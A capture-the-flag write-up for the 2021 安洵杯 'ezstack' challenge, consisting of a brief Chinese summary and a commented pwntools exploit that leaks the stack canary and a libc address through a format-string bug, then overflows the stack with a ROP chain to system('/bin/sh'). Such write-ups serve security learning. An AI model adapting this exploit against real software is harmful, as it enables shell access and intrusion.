安洵杯2021

ezstack

格式化字符串漏洞+ROP：先利用格式化字符串泄露 canary 和栈上的 __libc_start_main 返回地址，据此算出 libc 基址；再用栈溢出带着正确的 canary 覆盖返回地址，ROP 到 system("/bin/sh")。

exp

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

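context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# Target selection:
#   1 = local process
#   2 = remote challenge instance
#   3 = local listener on 127.0.0.1 (e.g. a socat/docker copy of the service)
debug = 1
filename = 'ezstack'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('node4.buuoj.cn', 20002)
elif debug == 3:
    p = remote('127.0.0.1', 12345)
else:
    # Fail loudly instead of hitting a NameError on `p` further down.
    log.error('unknown debug mode %d' % debug)
#23946

elf = ELF(filename)
# NOTE: elf.libc is the *local* loader's libc. Every offset derived from it
# below (symbols, gadgets, "/bin/sh") is only valid against the remote service
# if it runs the same glibc build; otherwise point `libc` at the libc shipped
# with the challenge, e.g. ELF('./libc.so.6').
libc = elf.libc

# gdb.attach(p,'b *$rebase(0xA29)')
# gdb.attach(p,'b *$rebase(0xA5C)')

# Stage 1: format-string leak. Positional arguments 11 and 13 were chosen for
# this binary's stack layout: the canary, then the saved return address into
# libc. Bytes literals so the script runs under both Python 2 and 3 pwntools.
payload = b'%11$p%13$p'
p.sendline(payload)

p.recvuntil(b'0x')
canary = int(p.recv(16), 16)
p.recvuntil(b'0x')
# The leaked return address is __libc_start_main+240 (the glibc 2.23 return
# into __libc_start_main); the 240 must be adjusted if the target libc differs.
main = int(p.recv(12), 16) - 240

# A stack canary always has a zero low byte; anything else means the format
# offset or the parse is wrong, and the stage-2 overwrite would only trip
# __stack_chk_fail.
if canary & 0xff != 0:
    log.error('canary leak looks wrong: %#x' % canary)

libc_base = main - libc.sym['__libc_start_main']
# libc is mapped page-aligned; a misaligned base means the -240 offset or the
# libc version is wrong, so stop here instead of sending a garbage ROP chain.
if libc_base & 0xfff != 0:
    log.error('libc base %#x is not page-aligned; check libc version/offset' % libc_base)

system_addr = libc_base + libc.sym['system']
pop_rdi = libc_base + next(libc.search(asm('pop rdi\nret')))
bin_sh = libc_base + next(libc.search(b'/bin/sh'))

# Stage 2: stack overflow with the recovered canary, then system("/bin/sh").
# Layout after the 0x18-byte buffer: canary, saved rbp, return address. The
# first pop_rdi qword presumably just fills the saved-rbp slot (its value does
# not matter); the second is the return address, so the chain executes
# `pop rdi; ret` -> rdi = "/bin/sh" -> system.
p.recvuntil(b'--+--')
payload = (b'a' * 0x18
           + p64(canary)
           + p64(pop_rdi) * 2
           + p64(bin_sh)
           + p64(system_addr))
p.sendline(payload)

p.interactive()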